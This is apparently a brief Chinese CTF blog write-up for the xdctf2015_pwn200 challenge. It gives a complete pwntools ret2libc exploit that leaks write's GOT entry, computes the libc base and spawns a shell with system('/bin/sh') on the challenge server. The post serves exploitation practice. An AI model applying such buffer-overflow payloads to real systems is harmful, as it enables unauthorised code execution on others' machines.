xdctf2015_pwn200

32位ret2libc
还是注意返回值得接返回地址后面

点击查看代码

from pwn import *
io=remote("node4.buuoj.cn",29550)
elf=ELF("./bof")
write_plt=elf.plt['write']
write_got=elf.got['write']
main_addr=elf.sym['main']
io.recvuntil("Welcome to XDCTF2015~!\n")
payload='a'*(0x6c+0x4)+p32(write_plt)+p32(main_addr)+p32(1)+p32(write_got)+p32(4)
io.sendline(payload)
write_addr=u32(io.recv(4))
io.recv()
libc=ELF("./libc-2.23(32).so")
libc_sys=libc.sym['system']
libc_write=libc.sym['write']
libc_bin=libc.search('/bin/sh\x00').next()
libcbase=write_addr-libc_write
sys_addr=libcbase+libc_sys
bin_addr=libcbase+libc_bin
payload='a'*(0x6c+0x4)+p32(sys_addr)+p32(main_addr)+p32(bin_addr)
io.sendline(payload)
io.interactive()

posted @ 2022-07-03 01:36 REPWNER 阅读(4) 评论(0) 收藏举报

刷新页面返回顶部

REPWNER

xdctf2015_pwn200

公告